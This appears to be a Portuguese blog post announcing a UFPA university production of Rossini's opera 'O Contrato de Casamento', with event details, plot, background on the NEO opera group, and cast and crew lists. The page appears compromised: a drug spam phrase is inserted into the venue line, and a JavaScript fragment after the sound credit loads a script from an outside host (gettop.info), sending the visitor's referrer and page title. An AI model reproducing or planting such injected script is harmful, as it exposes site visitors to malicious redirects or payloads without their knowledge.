LateralÓperaParáProgramação

UFPA apresenta a ópera “O Contrato de Casamento”

Encerrando o calendário acadêmico do ano, a última Quinta Cultura da Diretoria de Apoio à Cultura da Proex apresenta a ópera cômica “O Contrato de Casamento”, do italiano Rossini.

SERVIÇO

 

Centro de Eventos Benedito Nunes xenical philippines how much

Dias 21 e 22 (quarta e quinta-feira), às 19h.

Entrada franca.

 

Essa foi a primeira ópera de Rossini, quando o compositor tinha 18 anos. Teve sua estreia em Veneza e até hoje é muito encenada no mundo inteiro. São seis personagens principais, com os cantores se revezando entre caras e vozes, durante 80 minutos de espetáculo.

A iniciativa de apresentar um espetáculo que une todas as artes e tem em suas origens ser um espetáculo popular, contrariando a ideia de que ópera é para uma elite. A apresentação é aberta ao público, não apenas da UFPA e do seu entorno. “Essa ação é importante também porque mostra que sua função não se esgota na formação cognitiva ampliando-se também para a formação cultural, estética e de cidadania no contexto mais amplo”, explica o Reitor da UFPA, Prof. Dr. Carlos Edilson de Almeida Maneschy.

No elenco, professores e cantores formados pela Escola de Música da UFPA, Dione Colares, Jefferson Luz, Antônio Wilson, Ione Carvalho e Nilberto Viana. De fora, apenas barítono Manuel Alvarez do Rio de Janeiro como convidado. A equipe técnica é composta por ex–alunos dos cursos técnicos da UFPA, como Cláudio Bastos, Michelle Ferreira e Gilda Maia, professora da EMUFPA.

A produção é coordenada pelo Núcleo de Ópera (NEO), idealizado pela professora Dione Colares, pelo professor Vanildo Monteiro e pela soprano paraense Jena Vieira, com a realização conjunta da Pró-Reitoria de Extensão e do Centro de Eventos Benedito Nunes (CEBN). Esta montagem operística já é conhecida pelo público paraense, com estreia no Theatro da Paz, em 2009, e temporada em Tucuruí.  Sempre com casa cheia, ingressos esgotados e sessões extras.

O objetivo é levar estas apresentações para outros locais no Estado. “A proposta de levar a ópera aos diversos municípios onde a UFPA está presente, e também, evidencia a preocupação de que sejamos, de fato, uma universidade multicampi”, completa o Reitor.
Enredo

Acompanhamos a trama do negociante canadense Slook, que viaja até a Inglaterra para conhecer a futura esposa, encomendada para Tobias Milque por meio de uma carta e uma nota promissória.

As confusões começam quando os criados de Tobias Milque, contam à sua filha Fanny, que ela será oferecida como esposa. Só que a jovem está apaixonada por Edward Milford. O casal resolve ameaçar Slook para desistir da negociação.
Quinta Cultural

Programação cultural realizada sempre na última quarta-feira de cada mês e que pretende congregar a comunidade universitária com apresentações artístico-culturais que vão do teatro à dança, da música ao cinema, do regional ao clássico. O objetivo da iniciativa é promover a integração e o intercâmbio da produção cultural acadêmica com a produção externa e, assim, integrar diferentes formas de produções artísticas.
NEO – Núcleo Experimental de Ópera

O Núcleo Experimental de Ópera (NEO) foi idealizado pelos cantores Dione Colares, Jena Vieira e Vanildo Monteiro, tendo estreado em 2008 com a ópera Don Pasquale de Donizetti. O NEO tem como foco principal a realização de óperas que visam à prática artística e constante aprimoramento de nossos cantores.

Assim, o núcleo passou a reunir profissionais do canto lírico, buscando a construção de óperas de repertório que possam ser repetidas a qualquer momento, além de fomentar a integração entre cantores da região e profissionais convidados de outros estados e países.

O NEO tem como objetivo difundir a ópera em diversos municípios, promovendo o circuito de ópera no interior do Estado, assim como a orientação e realização de espetáculos bem cuidados, com elevados critérios técnicos e artísticos, na perspectiva de oferecer boas alternativas ao público, sem perder de vista a contemporaneidade e sintonia com o que é produzido pelo Brasil.

 

Elenco

– Clarina: Ione Carvalho
– Edward Milford: Antônio Wilson
– Fanny: Dione Colares
– Norton: Jefferson Luz
– Slook: Manuel Alvarez (RJ)
– Tobias Mill: Nilberto Viana

Piano: Paulo José Campos de Melo

 

Equipe Técnica

– Direção Artística: Dione Colares
– Direção de Produção: Nandressa Nuñez (SP)
– Direção Cênica: William Ferrara (EUA)
– Cenografia: Carlos Dalarmelino Junior (SP)
– Figurinos: Hélio Alvarez
– luminação: Rubens Almeida
– Visagismo: Omar Junior
– Direção de Palco: Claudio Bastos
– Legendas: Gilda Maia
– Assistente de Cenografia: Ribamar Diniz
– Contra-Regra: Michelle Ferreira
– Sonorização: Ronaldo Lourenços.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.